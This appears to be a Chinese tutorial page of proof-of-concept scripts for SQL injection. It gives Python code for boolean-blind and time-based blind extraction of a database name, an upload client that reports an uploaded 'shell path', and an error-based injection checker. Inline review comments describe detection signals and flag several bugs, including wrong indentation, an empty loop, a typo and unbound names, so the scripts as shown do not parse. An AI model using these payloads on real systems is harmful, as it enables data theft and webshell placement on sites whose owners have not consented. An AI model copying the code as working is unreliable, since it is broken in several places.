sql注入poc编写

#布尔(先获取长度后获取名字)
import requests,string
# Boolean-based blind SQL injection probe: recover the length of the current
# database name first, then its characters one position at a time.
# The oracle is the page size — a response the same length as the baseline
# "?id=1" page is taken as TRUE. For defenders: each probe is one GET whose
# query string contains `length(database())=` or `substr(database(),i,1)=`,
# so the pattern is a burst of sequential, near-identical requests that a
# WAF rule or access-log search can flag.
url = "http://test.com"  # placeholder base URL
# Baseline page size for the untouched query.
# NOTE(review): `.test` is not a Response attribute used anywhere else here;
# the comparisons below read `.text`, so a typo seems likely.
htmllen = len(requests.get(url=url+"?id=1").test)
print("htmllen:"+str(htmllen))
dbnamelen = 0
while True:
    dbnamelen_url = url + "?id=1'+and+length(database())="+str(dbnamelen)+"--+"
    # Compare the payload page size against the baseline page size.
    if len(requests.get(dbnamelen_url).text) == htmllen:
        print("The len of dbname:"+str(dbnamelen))
        break
    # Give up after 50 candidates (the original comment said 30; the code checks 50).
    if dbnamelen ==50:
        print("error")
        break
    dbnamelen +=1
# Recover the database name character by character.
dbname=""
# NOTE(review): this `while True:` has no indented body and is never exited;
# as pasted the script does not parse past this point.
while True:
# Positions 1..8 — hard-coded to an assumed name length of 8 rather than
# reusing the `dbnamelen` found above.
for i in range(1,9):
    for a in string.ascii_lowercase:
        dbname_url = url+"?id=1'+and+substr(database(),"+str(i)+",1)='"+a+"'--+"
        print(dbname_url)
        # Same page-size oracle as above. NOTE(review): the three lines after
        # the `if` sit at the `if`'s own indentation rather than inside it.
        if len(requests.get(dbname_url).text) == htmllen:
        dbname += a
        print(dbname)
        break

 

#延时(先获取长度后获取名字)
import requests,string
url = "http://test.com"  # placeholder base URL; every time-based probe below appends a query string to it
def timeOut(url):
    """Fetch *url* with a 3-second timeout and return the response body.

    Every exception raised while requesting or reading the page — a real
    timeout, but equally a refused connection, a DNS failure or a bad URL —
    is collapsed into the literal string "timeout". Callers that treat
    "timeout" as a positive signal therefore cannot distinguish a slow
    server from an unreachable one.
    """
    try:
        body = requests.get(url, timeout=3).text
    except Exception:
        body = "timeout"
    return body
# Time-based blind probe: when the injected condition is TRUE the server
# evaluates sleep(5), which exceeds timeOut's 3-second limit, so the helper
# returns "timeout". For defenders: the oracle is latency, so each positive
# probe is a request that holds a connection open for several seconds with
# `sleep(` visible in the query string.
dbnamelen = 0
while True:
    dbnamelen +=1
    dbnamelenurl = url+"?id=1'+and+if(length(database())="+str(dbnamelen)+",sleep(5),1)--+"
    print(dbnamelenurl)
    # Substring test on the returned body: a normal page that merely contains
    # the word "timeout" also counts as TRUE, and so does any failed request,
    # since timeOut maps every exception to "timeout".
    if "timeout" in timeOut(dbnamelenurl):
        print(dbnamelen)
        break
    # Give up after 50 candidates.
    if dbnamelen ==50:
        print("error")
        break
dbname=""
# One position per character of the length found above, lowercase letters only.
for i in range(1,dbnamelen+1):
    for char in string.ascii_lowercase:
        dbnameurl = url+"?id=1'+and+if(substr(database(),"+str(i)+",1)='"+char+"',sleep(5),1)'--+"
        print(dbnameurl)
        # NOTE(review): the three lines after the `if` sit at the `if`'s own
        # indentation rather than inside it, so the pasted version does not parse.
        if "timeout" in timeOut(dbnameurl):
        dbname += char
        print("dbname is"+dbname)
        break
# NOTE(review): `over` is not bound anywhere in this file; as written this
# line raises NameError.
print(over)

 

文件上传
# Multipart file upload client: POST the local file given as argv[2] to
# url + <save path> (argv[1] is the base URL) and print url followed by the
# response body from its fourth character on. The original line breaks were
# lost in the paste; they are restored here without changing any token.
import requests,sys
url = sys.argv[1]
path = sys.argv[2]
posturl =url + "文件保存路径"  # placeholder: the server-side save path; fill in per target form
# example: <input type="file" name="filedata"> — "filedata" is the form field name
# example: <input type="submit" name="submit" value="submit">
# NOTE(review): the file object is never closed; `with open(path, "rb") as f:`
# would be the usual form.
upfile = {"filedata":open(path,"rb")}
res = requests.post(url = posturl,files=upfile)
print("shell path:"+url+res.text[4:])  # truncate as needed

 

# Error-based SQL injection check: fetch the URL the user types in and look
# for the word "syntax" in the response, i.e. a database error message that
# leaked into the page. The match is a bare substring search, so any page
# that happens to contain "syntax" is reported as injectable.
import requests,re
# NOTE(review): `cookie=""` is keyword-argument syntax inside braces, not a
# dict entry; as pasted this literal does not parse.
header={
    cookie=""
}
url=input("请输入你要验证的url:")
r =requests.get(url,headers=header)
# NOTE(review): `content` is an unbound name here — `str(r, content)` is the
# two-argument str(bytes, encoding) form; presumably `r.content` was intended.
res=str(r,content)
# Decide based on a specific marker in the returned page (here "syntax" as the example).
if re.search("syntax",res):
    print("存在sql注入")
else:
    print("不存在sql注入")

 
